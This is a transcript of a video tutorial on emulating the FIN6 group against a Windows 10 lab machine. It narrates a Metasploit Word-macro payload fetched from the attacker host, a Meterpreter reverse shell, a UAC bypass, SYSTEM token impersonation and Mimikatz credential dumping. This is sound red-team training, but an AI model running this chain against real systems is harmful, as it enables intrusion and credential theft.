Welcome. In this video, I'll be demonstrating adversary emulation on a Windows 10 client, and we'll be using the TTPs of FIN6. So to know more about FIN6, let me open up a browser and let's search for CTID and site github.com and click on the second link, and this will open up a GitHub page for CTID, which is Center for Threat Informed Defense. And let's look at the adversary emulation library repository, and let's search for that. So let's search adversary, and we're going through the list and searching for adversary emulation library. Yeah, there it is, and let's click on that. And once you click on that, let's click on the FIN6 and FIN6 adversary emulation. So this repository contains an adversary emulation plan for FIN6. So this FIN6 targets it's basically a financially motivated cybercrime group and has aggressively targeted and compromised point of sale systems in the hospitality as well as retail sector since 2015, and it has also targeted e-commerce and multinational company. So there are basically two phases, which is phase one and phase two. Phase one deals with initial access discovery as well as credential harvesting, and phase one actually is the one where there is initial access discovery and credential dumping, and phase two has privilege escalation and lateral movement. Let's go to this operation flow and let's look at it. So we have a C2 setup, which is command and control server, and tools preparation, initial access discovery, credential access, exfiltration, and we can see lateral movement. So these are some of the tactics which are being used by FIN6 group. And so they're mainly the initial access takes place with spear-phishing. We'll not be going through that in this video. What we'll be looking at is initial access and the privilege escalation as well as credential dumping. So only three phases or tactics which are being explained in this video. And so yeah, these are some of the tools for initial access, which are C2, Cobalt Strike, as well as Metasploit, and these are the procedures which are there in the discovery and privilege escalation and credential dumping, collection and exfiltration. So we can see along with the commands there is an adversary emulation plan. Let's go to phase two, and once you look at it, you'll get the three kinds of attack, which is attacking POS systems and its procedures given in detail, as well as attacking e-commerce platform. Like there's some of the tactics include lateral movement and credential dumping, exfiltration, as well as for ransomware it is impact instead of the traditional credential dumping. So yeah, so let's look at this. So we'll be going through initial access, privilege escalation, and credential dumping. We'll not go to the discovery and as well as collection and exfiltration. That's something you can copy paste from the repository. And so now let's start MSF console. So I have downloaded the MSF console, MS, Microsoft, sorry, Metasploit Framework library from the GitHub repository, and I'm using particularly 6.4.9. And let me type msf-649 dash dash version. So this is a shortcut for Metasploit Framework 6.4.9 version. So we get this version, right? So yeah, so this particular version is required for creating the Word macro, uh, the Microsoft Word macro, and so that is why we're using this. Let's start our Metasploit Framework console, and we should get a banner as well as the CLI for that. Yeah, we got the banner, and we can see here it's a banner for Metasploit and Metasploit version 6.4.9 dev and 2420 exploits, 1248 auxiliaries, posts, payloads, encoders, and evasion techniques. So we got the command line interface. Now let's search for word macro, and if we search for that, we'll get this particular exploit. So let's do use 0, and let's type options. So we need to set our L host as well as L port. So to set the L host, let's do IPA and get the IP address. Let's copy this IP address, and let's do set L host space IP address, and let's do set L port space 4444 or any port of your choice, and let's do options again. So we need to give our exit function as thread and target as Microsoft Office Word on Windows. Now let's do show targets, and we'll get two options, and we need to select the first option. And now let's run the exploit using run command, and we will get the docm file. So let's copy this, and let's go to payloads, and let's delete the previous docm file, and let's copy this file in that payloads directory. Let me type in my Kali password, and let's set firewall rules like UFW allo 4444, UFW allo 5555, as well as port 80 for the file transfer. And let's start the HTTP server. And let's use exploit slash multi slash handler. And let's set the payload as Windows Meterpreter reverse TCP. Let's do options again, and we need to set lhost. So let's set lhost as 172.20.10.2, and let's set exit function as thread. Let's do options again, and let's set exit function as thread. and set exit func and space thread. So after we set this, let's do options again, and let's run the exploit. Actually, run the listener, and go to let's go to Microsoft Windows 10, and let's open a PowerShell. So let's open administrative PowerShell, and let's search for PowerShell. So let's search for PowerShell, and let's do run as administrator, and let's click yes. And let's type IWR, so invoke web request, and dash URI to specify the particular URI, and let's do HTTP colon double slash 172.20.10.2 colon 80 slash msf dot docm, and let's give the out file as C users and username, which is my username, and desktop, and let's save it as msf.docm, and let's hit enter. So the payload is successfully delivered, and now we need to double click this, and Microsoft Word will open this macro, and you had to enable content in order for the macro to run. So let's wait for a while. So the Word macro document file is open, and let's click on enable content, and we will get a Meterpreter session, and session 1 is open, and let's do get UID. So let's do get UID, and we get Windows 10 slash username, and let's do PS to view all the process which are running, and let's try to migrate to some process because we are in x86 and we require x64 for privilege escalation. The Windows 10 box is in x64 box, so it's a 64-bit Windows 10, and 30 if it was 32-bit like Windows 8 or 7, then you can do a privilege escalation on that. But let's migrate to this svchost.exe, and we get the process ID, and we type migrate space process ID, and let's background this session, and let's search for exploit suggester. Let's see. Okay, let's do use 0, and let's do options. Let's view the options, and it just requires one thing, which is session. So let's do set session uh, as one, and let's run this particular post exploitation technique. So basically, this will run a bunch of exploits, priv-esc exploits against the Windows 10 client machine, and it will suggest the exploits. So that's hence the name local exploit suggester. So let's do, while that runs, let's try to recall what we did till now. So let's do nano methodology.txt, and let's do initial access phase. So we created a word macro using Metasploit Framework. So using Metasploit Framework console, we created a word macro, particularly the version 6.4.9 dev, and we delivered it using, actually we had to use spear-phishing. So it is deliverable by spear-phishing. So spear-phishing is the technique where phishing a large group of users, for example, a company, the people who are associated with the company. So that is spear phishing, and tools required are Metasploit framework. So the MSF hyphen 649 or MSF console is the tool which is required. I just named it as MSF hyphen 649 so that I don't get mixed up with the MSF console. And we require a C2 framework if we need to bypass certain antivirus. So we could use the artifact kit of Cobalt Strike. And next we do post-exploitation techniques, like the one which we are running, like the local exploit suggester. So that is a Metasploit module. It is named local exploit suggester. And we look for that, and our exploit has been, I mean the local exploit has been run, and we can look into this bypass UAC for helper. So this is not a direct thing which you run and you get a administrative privileges or administrator shell. You need to do a workaround in this. I'll be explaining that. So let's do options, and let's first set our target as Windows X64 instead of 32-bit. So let's do show targets, and let's do set target as one, and let's do set payload as Windows x64 interpreter reverse TCP. So by default it is x86, so we need to specify x64 reverse TCP. So we set the payload. Now we do options, and we need to give a session. So set session as one, and we need to change the L port. So let's set L port as 5555 because that's the one which we allowed. The rule has been allowed uh, to allow the port 5555. So that is why we set the L port as that. And let's set exit function as thread instead of process. And let's run this exploit. So we do options again, double check it, and and everything looks fine. And let's run. Let's hit run and let's wait for some time. So we get a meter session back. So to point out the difference between the session 2 and session 1, session 2 bypass UAC has been run, and session 1, so it's a normal meter session. So let's do background and let's go to sessions 1. And if we do get UID, so first let's do get UID, we'll get Windows 10 and my username. And if we do get privs, sorry, yeah, we get certain privileges, right? So the default privileges we get, and let's do background and let's go to sessions 2 and do the same, get UID. So we get Windows 10 and my username. And if we do get privs, so we will get elevated privileges like SC impersonate privilege, SC backup privilege. So you can see all the elevated privileges which we got after running bypass UAC. So using this, we will gain administrative shell. So now what we can do is we can type in load incognito to switch to incognito mode. Sorry, it's loading extensions incognito. So we need to load the extensions, load a Kiwi. So creds underscore all. We don't get anything from the extension Kiwi. So let's do list underscore tokens dash u. So if we do list underscore tokens dash u, we will get NT authority system as well as Windows 10 and the normal user. So let's do impersonate underscore token NT authority system. So this will essentially impersonate the access token for NT authority system. And so successfully impersonated user. And let's do get UID. For let's do creds underscore all, and we will dump out all the credentials for example the NTLM hash, the SHA-1 hash, and the DP API. And we get all the credentials because this is an end user. So the user Arvinda is a end user and it does not have administrator. So we get only one NTLM hash. So we can log into the system using pass the hash techniques using impacket. So now using bypass UAC technique, we got elevated privileges. So we got elevated privileges like SC impersonate privilege, SC backup privilege. We can also dump ntds.date. We can dump SAM system and security and try to do impacket secrets dump on that. So that's all the possibilities. And using token impersonation, we impersonated NT authority system. So using that procedure or technique, we'll be able to get or we'll be able to impersonate NT authority system, NT authority system. And let's search for that. It was a forward or a backward slash, I guess. Yes, a backward slash. And once we get the access token of NT authority system, it's like we gained administrator access. Then we can dump all the credentials using the commands load kiwi and creds underscore all. So those particular those particular the Kiwi module, particularly the Kiwi extension is Mimikatz extension. So using those extensions, we'll be able to dump all the credentials and get the NTLM hash. So if we do shell, we will get the command prompt. And let's terminate this and let's now the possibilities are endless. We can do post exploitation techniques, and who am I? We can do dir, and we have gained access as administrative user. So the administrator user is nothing but the NT authority system. So we find all the DLLs here. So that's it from my side, I guess. If you want to go through the methodology again, I'll go through it again. So initial access, we created a word macro using Metasploit 6.4.9 version, which was deliverable by spear-phishing. So we just used an invoke web request, and because we did not do spear-phishing technique, and tools required as Metasploit framework as well as C2 framework like Cobalt Strike, and post-exploitation using Metasploit's local exploit register and bypass UAC to get higher privileges, and token impersonation procedure to impersonate anti-authority systems access token and dump all the credentials using these two commands. So thanks for watching till now, and please like and sub.